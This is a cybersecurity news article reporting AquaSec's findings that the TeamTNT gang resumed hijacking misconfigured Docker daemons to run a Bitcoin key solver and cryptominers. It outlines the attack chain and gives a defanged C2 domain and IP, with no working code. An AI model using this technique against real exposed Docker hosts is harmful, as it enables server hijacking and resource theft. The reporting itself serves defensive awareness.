TeamTNT is Back and Targeting Servers to Run Crypto Solvers BitcoinSecurity Affairs

Meta description

AquaSec researchers have observed cybercriminal gang TeamTNT hijacking servers to run the Bitcoin solver since early September.

During the first week of September, AquaSec researchers identified at least three different attacks targeting their honeypots, which experts linked to the cybercriminal gang TeamTNT.

The TeamTNT botnet is a crypto-mining malware operation that has been active since April 2020 and targets Docker installations. TeamTNT group activity was detailed by security firm Trend Micro, but in August 2020, Cado Security experts discovered that the botnet is also capable of targeting misconfigured Kubernetes installations.

In January 2021, the cybercrime gang launched a new campaign targeting Kubernetes environments with the Hildegard malware.

The discovery of the recent attacks is important because on November 6, 2021, TeamTNT communicated via Twitter a word of farewell. Experts pointed out that their infrastructure continued to automatically infect new victims with old worms capable of scanning and infecting new systems.

The new attacks suggest the hacking group is back in action.

The new TeamTNT attacks aim to hijack servers to run the Bitcoin solver, experts have tracked the activity as the “Kangaroo attack” as the threat actors were using Pollard’s Kangaroo WIF solver.

Attackers scan for vulnerable Docker daemons, deploy an AlpineOS image, deliver a script (“k.sh”), and fetch the solver from GitHub.

“What we found was that TeamTNT searched for a misconfigured and deployed alpine Docker daemon, a vanilla container image, with a command line to upload a shell script (k.sh) to a C2 server (domain : whatwill[.]be on IP 93[.]95[.]229[.]203). reads the analysis published by AquaSec. “The shell script clones a GitHub project from what appears to be a TeamTNT account. The project was a bit of a conundrum initially, clarifying that it is a fork of ‘Pollard’s kangaroo for SECPK1’.

TeamTNT Kamgaroo

Pollard’s Kangaroo Interval ECDLP solving algorithm appears to be an attempt to break the SECP256K1 encryption that is used by Bitcoin to implement its public-key cryptography. The TeamTNT group uses the computing power of compromised targets to run the ECDLP solver.

The algorithm runs in a distributed manner as the algorithm splits the key into chunks and distributes them to different nodes which are the compromised servers, collecting the results which are then written locally to a text file.

“Breaking cryptographic encryption is considered ‘Mission: Impossible.’ If you actually succeed in doing it, you potentially have the keys to almost anything connected online, which could have a devastating effect on the entire world. Internet, continue the experts.

According to experts, the hacking gang is probably experimenting with new attack techniques.

AquaSec researchers have also observed the gang using attacks attributed to their activity in the past, such as the Cronb attack, but now using new feature enhancements.

The new variant of “Cronb Attack” is based on a new C2 infrastructure and a new data exchange.

Experts also observed the “What Will Be” attack against their honeypots, the threat actor leveraged a misconfigured Docker API to run the alpine vanilla container image with a malicious command designed to download and run the dc.sh shell file.

The attack aims to deploy a cryptominer on the target systems and perform SSH scans over the network.

“TeamTNT has been very active between 2020 and 2021. They had used many tools and techniques in their campaigns and launched them frequently. Some of these tools have been designed to evade container environments, steal tokens and credentials, scan and attack local and external networks, hide activities with rootkits, and more. concludes the report. “Now TeamTNT seems to be back with new tricks. We are still evaluating whether these three attacks are a sign that they have resumed their campaigns against cloud-native environments or not.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(Security cases hacking, cryptomining)

Comment here